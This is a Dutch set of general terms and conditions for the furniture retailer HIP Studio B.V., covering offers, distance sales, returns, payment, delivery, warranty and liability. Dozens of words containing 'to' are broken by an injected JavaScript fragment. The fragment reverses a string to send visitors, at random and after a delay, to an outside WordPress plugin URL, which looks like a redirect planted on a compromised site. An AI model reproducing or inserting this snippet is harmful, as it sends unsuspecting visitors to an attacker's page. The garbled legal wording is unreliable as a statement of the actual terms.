Algemene voorwaarden

Art. 1 Definities

In deze algemene voorwaarden wordt verstaan onder:

– gebruiker: degene die gebruik maakt van deze algemene voorwaarden.

– klant: degene met wie gebruiker een overeenkomst is aangegaan, waarop deze algemene

voorwaarden van toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toepassing zijn.

– schriftelijk: onder een schriftelijke rechtshandeling van de klant wordt mede begrepen een

elektronische, met dien verstande dat deze laatste enkel door gebruiker wordt aanvaard na haar schriftelijke dan wel elektronische bevestiging daarvan.

HIP Studio B.V. Hollandse kade 34 1391 JM ABCOUDE

Tel: 0294-280620

E: info@hipstudio.nl KvK-nummer: 59335645 BTW-nummer: NL 853428219B01

Art. 2 Toepasselijkheid

 1. Deze algemene voorwaarden zijn van toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toepassing op alle aanbiedingen en overeenkomsten van de gebruiker. Afwijkingen en/of aanvullingen op deze voorwaarden gelden slechts indien zij schriftelijk tussen gebruiker en klant zijn overeengekomen en uitsluitend voor die overeenkomst, waarbij de afwijkende bedingen werden gemaakt. Eventuele algemene voorwaarden van de klant worden door de gebruiker niet aanvaard, tenzij de gebruiker expliciet en schriftelijk anders verklaart.
 2. Het recht van de gebruiker, om voor de uitvoering van de overeenkomst met haar klant derden in te schakelen, heeft geen invloed op de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toepasselijkheid van deze algemene voorwaarden op de desbetreffende overeenkomst tussen gebruiker en klant.
 3. Mochten van deze algemene voorwaarden bepalingen nietig zijn of worden vernietigd, dan zullen de overige bepalingen onverminderd van kracht blijven.

Art. 3 Offertes & Aanbiedingen

 1. Aanbiedingen van gebruiker zijn vrijblijvend, een ondeelbaar geheel en worden met inachtneming van het volgende artikel gedurende dertig dagen na datum van de aanbieding gestand gedaan, tenzij de aanbieding anders vermeldt. Offertes zijn geen koop op afstand.
 2. Behoudens onmiskenbare fouten in de aanbieding, is de gebruiker aan de aanbieding gebonden, indien de schriftelijke aanvaarding hiervan door de klant de gebruiker heeft bereikt binnen de onder lid 1 genoemde termijn.
 3. Indien in de aanvaarding voorbehouden of wijzigingen ten opzichte van de aanbieding worden aangebracht, zijn deze slechts van toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toepassing, indien de gebruiker aan de klant schriftelijk bericht geeft met deze afwijkingen van de aanbieding in te stemmen.

Artikel 3a. De overeenkomst van koop op afstand in de zin van afdeling 9A boek 7 BW (artikel 7.46a BW en verder)

1.Indien de Klant het aanbod langs elektronische weg heeft aanvaard, bevestigt de Gebruiker onverwijld langs elektronische weg de ontvangst van de aanvaarding van het aanbod.

2.Indien levering van een besteld product onmogelijk blijkt te zijn, zal de Gebruiker zich inspannen om een vervangend artikel beschikbaar te stellen. De Klant wordt daar dan langs elektronische weg van op de hoogte gesteld.

3.Bij alle overeenkomsten van koop op afstand in de zin van afdeling 9A boek 7 BW is vooruitbetaling van het gehele aankoopbedrag en eventuele verzendkosten vereist. 4.Overeenkomsten waaraan een gespecificeerde offerte vooraf is gegaan worden niet beschouwd als koop op afstand in de zin van artikel 7.46a BW en verder.

Artikel 3b. Retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tourneren, reclamaties en annuleringen van koop op afstand in de zin van afdeling 9A boek 7 BW (artikel 7.46a BW en verder)

1.Gedurende 14 werkdagen na de ontvangst van de

goederen heeft de Klant het recht de koop op afstand zonder opgave van redenen te ontbinden. De artikelen moeten in geval van ontbinding binnen 14 werkdagen na aflevering in de onbeschadigde originele verpakking met bijsluiting van een kopie factuur worden geretoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tourneerd. De verzendkosten bij retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tourneren zijn voor rekening van de Klant. Terugbetaling van het aankoopbedrag vindt plaats wanneer het artikel door

Gebruiker ongeschonden en in originele verpakking wordt ontvangen. De Gebruiker hoeft geen akkoord te geven voor het retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tourneren en is niet verantwoordelijk voor het overschrijden

van de termijn. Artikelen welke in de SALE zijn gekocht, kunnen niet geretoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tourneerd worden en hierop

worden geen reclamaties geaccepteerd.

 1. Tijdens de genoemde termijn zal de Klant zorgvuldig omgaan met het product en de verpakking. Hij zal het product slechts in die mate uitpakken of gebruiken voor zover dat nodig is om te kunnen beoordelen of hij het product wenst te behouden. Indien hij van zijn recht van ontbinding gebruik maakt, zal hij het product met alle geleverde toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toebehoren en indien redelijkerwijs mogelijk in de originele staat en verpakking aan de Gebruiker retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tourneren, conform de door de Gebruiker verstrekte redelijke en duidelijke instructies.
 2. Uitsluiting van het recht van ontbinding is slechts mogelijk voor producten:
 3. die door de Gebruiker toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot stand zijn gebracht overeenkomstig specificaties van de consument;
 4. die duidelijk persoonlijk van aard zijn;
 5. die door hun aard niet kunnen worden teruggezonden;
 6. die in de sale zijn aangeschaft;

4.Eventuele klachten kunnen worden verzonden naar onze service afdeling info@hipstudio.nl. Wanneer de bestelling na opening niet voldoet aan de eisen van de Klant, dit graag binnen 48 uur bij Gebruiker schriftelijk melden op info@hipstudio.nl.

Art. 4 Prijs

 1. De door de gebruiker gehanteerde verkoopprijzen zijn in euro’s en inclusief het op het moment van sluiten van de overeenkomst geldende BTW-hoog tarief, docht exclusief kosten van transport, van verpakking, van aflevering en van installatie, tenzij partijen uitdrukkelijk en schriftelijk anders zijn overeengekomen.
 2. De gebruiker heeft het recht de tussen partijen overeengekomen prijs aan te passen, indien na het moment van aanbieding al dan niet voorzienbare wijzigingen hebben plaatsgevonden in de kosten van grondstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toffen, van transport, van lonen of anderszins. De klant heeft in een dergelijke situatie het recht de overeenkomst te ontbinden, tenzij de uitvoering van de opdracht reeds een aanvang heeft genomen.

Art. 5 Betaling

 1. Behoudens het geval de factuur anders vermeldt, is de klant verplicht de koopprijs bij aflevering op een door de gebruiker aangegeven wijze te voldoen. De gebruiker is gerechtigd de klant maximaal de helft van de koopprijs vooruit in rekening te brengen.
 2. De klant is niet bevoegd op de koopprijs enig bedrag wegens een door hem gestelde tegenvordering in mindering te brengen c.q. te verrekenen.
 3. Indien de klant niet tijdig betaalt, is hij van rechtswege in verzuim en vanaf dat moment een vertragingsrente over het openstaande bedrag verschuldigd van 1,5% per maand, een gedeelte van de maand daaronder begrepen.
 4. Indien de gebruiker – vanwege niet nakoming van de verplichtingen door de klant – toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot buitenrechtelijke maatregelen ter verkrijging van de gelden overgaat, komen de daadwerkelijk door de gebruiker gemaakte kosten daarvan voor rekening van de klant, met een minimum van 15% van het in te vorderen bedrag.
 5. De door de klant gedane betalingen strekken eerst toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot voldoening van de in lid 4 genoemde kosten, vervolgens toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot voldoening van de in lid 3 genoemde vertragingsrente en toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot slot toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot voldoening van de hoofdsom. Indien de klant meerdere facturen heeft openstaan bij de gebruiker, strekt betaling van de hoofdsom eerst toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot voldoening van de oudste factuur.

Art. 6 Levering en risico

 1. Vanaf het moment van levering, zijn de zaken voor rekening en risico van de klant.
 2. De in de aanbieding en overeenkomst genoemde levertijden gelden bij benadering en zijn derhalve geen fatale termijnen. Overschrijding van de termijnen geeft de klant pas recht op ontbinding van de tussen partijen gesloten overeenkomst, nadat de klant de gebruiker schriftelijk in gebreke heeft gesteld en aan de gebruiker een redelijke termijn heeft gegeven alsnog aan de verplichtingen te voldoen.
 3. De klant verplicht zich toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot afname van de gekochte roerende zaken op het moment dat deze bij hem worden afgeleverd, alsmede toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot het verstrekken van de voor de levering noodzakelijke informatie. De klant dient de zaken bij levering of zo spoedig mogelijk, binnen 48uur daarna te (laten) onderzoeken om te bezien of het geleverde aan de overeenkomst voldoet.
 4. Indien de klant in gebreke blijft aan het gestelde in de eerste volzin van lid 3 te voldoen, worden de zaken voor rekening en risico van de klant opgeslagen.
 5. De klant wordt bij aankoop geïnformeerd over afmetingen van het product, het risico dat artikelen door hun afmeting de woning / pand niet binnen kunnen, is derhalve voor rekening van de klant.

Artikel 6a. Leveringen, uitvoering en wijzigen overeenkomst; prijsverhoging

 1. De in de aanbieding en overeenkomst genoemde levertijden gelden bij benadering en zijn derhalve geen fatale termijnen.
 2. Bij aflevering dient de consument de pakbon van de chauffeur te ondertekenen voor een goede en volledige ontvangst van alle goederen die vermeld staan op de pakbon.
 3. Meubel leveringen geschieden altijd in overleg met de consument. Indien de consument op een vooraf afgesproken tijdstip voor levering niet aanwezig is om de goederen in ontvangst te nemen, worden er bezorgkosten in rekening gebracht. De hoogte van deze kosten is afhankelijk van het aantal gereden kilometers.
 4. Indien de consument de goederen niet op de afgesproken leverdatum kan ontvangen, dient toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toch het volledige restbedrag (indien er sprake is van een restbedrag) van de factuur voldaan te worden op die datum. Indien de goederen door Gebruiker langer dan 3 weken opgeslagen moeten worden, mag Gebruiker hier opslagkosten voor rekenen.
 5. Levering is altijd exclusief plaatsing tenzij anders afgesproken.
 6. Als plaats van levering geldt het adres dat de consument aan de Gebruiker kenbaar heeft gemaakt.

Art. 7 Ontbinding

 1. De gebruiker is gerechtigd om zonder ingebrekestelling of rechterlijke tussenkomst de overeenkomst te ontbinden dan wel haar verplichtingen uit de overeenkomst met klant op te schorten, zonder dat gebruiker toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot enige schadevergoeding, garantie of anderszins gehouden is, indien:

– de klant in staat van faillissement wordt verklaard, surseance van betaling heeft verkregen, of andere omstandigheden gebruiker ter kennis komen die goede grond geven te vrezen dat de klant niet aan zijn verplichtingen zal (kunnen) voldoen;

– de klant ondanks een verzoek van de gebruiker daartoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toe geen of onvoldoende zekerheid heeft gesteld voor de nakoming van de verplichtingen.

 1. Door de ontbinding worden over en weer bestaande vorderingen onmiddellijk opeisbaar. De klant is aansprakelijk voor de door de gebruiker geleden schade, onder meer bestaande uit winstderving en de door de gebruiker reeds gemaakte kosten.

Art. 8 Eigendomsvoorbehoud

 1. De gebruiker blijft, ondanks overgang van het risico op de klant, eigenaar van alle door haar op enig moment aan de klant geleverde zaken, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}totdat de koopprijs en alle overige opeisbare vorderingen die gebruiker op klant mocht hebben uit welke hoofde dan ook, daaronder begrepen vertragingsrente en buitengerechtelijke kosten, volledig zijn voldaan.
 2. Indien de gebruiker goede grond heeft te vrezen dat de klant de verplichtingen uit de overeenkomst niet zal nakomen, is de gebruiker bevoegd de zaken terug te nemen.
 3. De klant is niet bevoegd de zaken waarop het eigendomsvoorbehoud van gebruiker rust, te vervreemden, te verpanden of anderszins te bezwaren, noch op enigerlei wijze uit zijn bedrijf te (doen) verwijderen.
 4. Indien een derde rechten wil doen gelden op zaken waarop een eigendomsvoorbehoud van gebruiker rust, zal de klant onmiddellijk gebruiker schriftelijk daarvan op de hoogte stellen.

Art. 9 Garantie

 1. De geleverde zaak moet die eigenschappen bezitten die de afnemer op grond van de overeenkomst bij normaal gebruik mag verwachten (conformiteit). Dit geldt tevens bij bijzonder gebruik voor zover dit door partijen bij het sluiten van de overeenkomst is voorzien. Wordt aan deze verwachtingen niet voldaan, dan heeft de afnemer recht op reparatie respectievelijk vervanging, ontbinding en/of prijsvermindering.
 2. De ondernemer verstrekt bovenop zijn wettelijke verplichting genoemd in lid 1 de afnemer garantie op de geleverde zaak, voor zover het betreft gebreken waarvan de ondernemer niet aannemelijk kan maken dat deze het gevolg zijn van niet met de bestemming corresponderend gebruik. Tenzij uitdrukkelijk bij het aanbod naar voren gekomen en schriftelijk of elektronisch anders overeengekomen, wordt de garantie gegeven volgens het volgende systeem:
 • toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot één jaar na factuurdatum: de kosten van reparatie resp. vervanging,

met inbegrip van de vracht- en voorrijkosten, komen volledig voor rekening van de ondernemer;

 • één jaar en toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot twee jaar na factuurdatum: de kosten van reparatie, resp. vervanging, met inbegrip van de vracht- en voorrijkosten, komen voor 2/3 gedeelte voor rekening van de ondernemer;
 • na twee jaar en toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot drie jaar na factuurdatum: de kosten van reparatie resp. vervanging, met inbegrip van de vracht- en voorrijkosten, komen voor 1/3 gedeelte voor rekening van de ondernemer. Het recht op vervanging komt de afnemer niet toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toe voor zover het gebrek redelijkerwijs is te herstellen.

Het recht op vergoeding van de vracht- en voorrijkosten wordt na verhuizing buiten Nederland beperkt toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot die kosten die de ondernemer kwijt zou zijn geweest als de afnemer was blijven wonen op het adres waarop de zaak is afgeleverd.

 1. De verplichting van de ondernemer met betrekking toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot conformiteit genoemd in lid 1 en zijn eventuele productgarantie genoemd in lid 2 vallen niet onder de aanbetalingsgarantie genoemd in artikel 17 lid 1.
 2. De datum van indiening van de klacht door de afnemer is beslissend voor de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toepassing van bovengenoemd systeem.
 3. Indien door de fabrikant van de zaken een verdergaande garantie wordt gegeven aan de ondernemer, geldt deze garantie ook voor de afnemer.
 4. Garantiebepalingen zijn slechts van kracht bij het met de bestemming corresponderend gebruik van de geleverde zaken of van het uitgevoerde werk.
 5. De afnemer is verplicht zich als een goed afnemer te gedragen, waaronder bijvoorbeeld wordt verstaan dat de zaak goed en afdoende wordt onderhouden en oordeelkundig wordt behandeld.
 6. Afwijkingen aan het geleverde betreffende kleur (wat wettelijk 3% mag afwijken), slijtvastheid, structuur en dergelijke, welke uit technisch oogpunt aanvaardbaar zijn volgens geldende, gebruikelijke normen, dan wel handelsgebruik, kunnen het recht op garantie en/of schadevergoeding beperken of uitsluiten.

Art. 10 Aansprakelijkheid

 1. Ongeacht het bepaalde in artikel 9 (garantie) is de gebruiker niet aansprakelijk voor de schade, van welke aard dan ook, behalve voor schade, veroorzaakt door opzet of grove schuld aan de zijde van de gebruiker.
 2. De aansprakelijkheid is in ieder geval beperkt toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot het bedrag dat per geval op grond van de aansprakelijkheidsverzekering wordt uitgekeerd, dan wel, indien de verzekering de schade niet dekt en de gebruiker aansprakelijk is, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot een bedrag, gelijk aan tweemaal de factuurwaarde van (dat deel van) de overeenkomst, waarop de aansprakelijkheid van toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toepassing is.

Art. 11 Overmacht

 1. Gebruiker is gerechtigd haar verplichtingen jegens de klant op te schorten, gedurende de periode waarin zij door overmacht is verhinderd daaraan te voldoen.
 2. Van overmacht aan de zijde van gebruiker is sprake, indien zich omstandigheden voordoen die redelijkerwijze geacht moeten worden de (tijdige) nakoming van de overeenkomst in de weg te staan. Daaronder wordt uitdrukkelijk begrepen het geval dat gebruiker niet (tijdig) van haar leverancier, de aan de klant verkochte zaken, krijgt geleverd.
 3. Indien door overmacht de levering meer dan twee maanden vertraagd wordt, zijn zowel de gebruiker als de klant bevoegd de overeenkomst te ontbinden. In dat geval heeft de gebruiker slechts recht op vergoeding van de door hem gemaakte kosten.
 4. Indien de overmacht intreedt, terwijl de overeenkomst reeds ten dele is uitgevoerd, heeft de gebruiker, indien door overmacht de resterende levering meer dan twee maanden vertraagd wordt, de bevoegdheid om voor het reeds afgeleverde gedeelte van de zaken de daarvoor verschuldigde koopsom in rekening te brengen, tenzij de klant kan aantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonen, dat het reeds afgeleverde gedeelte van de zaken door de klant niet meer doeltreffend kan worden gebruikt tengevolge van het niet afleveren van de resterende zaken.

Art. 12 Kwaliteit en omschrijving

 1. Indien door de gebruiker een model, monster of voorbeeld is getoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toond of verstrekt, wordt dit vermoed, slechts te zijn gedaan ter aanduiding: de hoedanigheden van de te leveren zaken kunnen van het monster, model of voorbeeld afwijken, tenzij uitdrukkelijk was vermeld dat zou worden geleverd conform het getoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toonde of verstrekte model, monster of voorbeeld.

Art. 13 Wettelijke technische vereisten

 1. De gebruiker waarborgt, dat het ontwerp, de samenstelling en de kwaliteit van de zaken, die op grond van de aanbieding geleverd moeten worden, in alle opzichten voldoen aan alle terzake toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toepasselijke eisen, die gesteld worden in Nederlandse wetten en/of andere van overheidswege terzake gegeven voorschriften, die van kracht zijn op het tijdstip van het sluiten van de overeenkomst.
 2. Indien de klant andere technische eisen aan de te leveren zaken stelt, dan de normaal gebruikelijke eisen, dient dit voor het sluiten van de overeenkomst schriftelijk aan de gebruiker kenbaar te worden gemaakt.

Art. 14 Intellectuele eigendomsrechten

 1. Alle rechten van intellectuele of industriële eigendom op alle krachtens de overeenkomst ontwikkelde of ter beschikking gestelde ontwerpen, tekeningen en overige goederen, berusten uitsluitend bij gebruiker. De door gebruiker geleverde tekeningen zijn indicatief en kunnen niet worden beschouwd als maat- en bestektekeningen. Afmetingen die op de tekeningen staan vermeld, dienen te allen tijde door de uitvoerende partij te worden gecontroleerd.

Art. 15 Toepasselijk recht en geschillen

 1. Deze overeenkomst is onderworpen aan het Nederlands recht. De toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toepasselijkheid van het Weens Koopverdrag wordt hierbij uitdrukkelijk uitgesloten.
 2. Alle geschillen tussen gebruiker en klant, die direct of indirect voortvloeien uit een overeenkomst tussen hen, worden ter beoordeling voorgelegd aan de bevoegde rechter van de vestigingsplaats van gebruiker, behoudens het geval de klant – binnen een maand na inroeping door gebruiker van dit artikel – haar schriftelijk meedeelt om de beslechting van het geschil voor te leggen aan de wettelijk bevoegde rechter.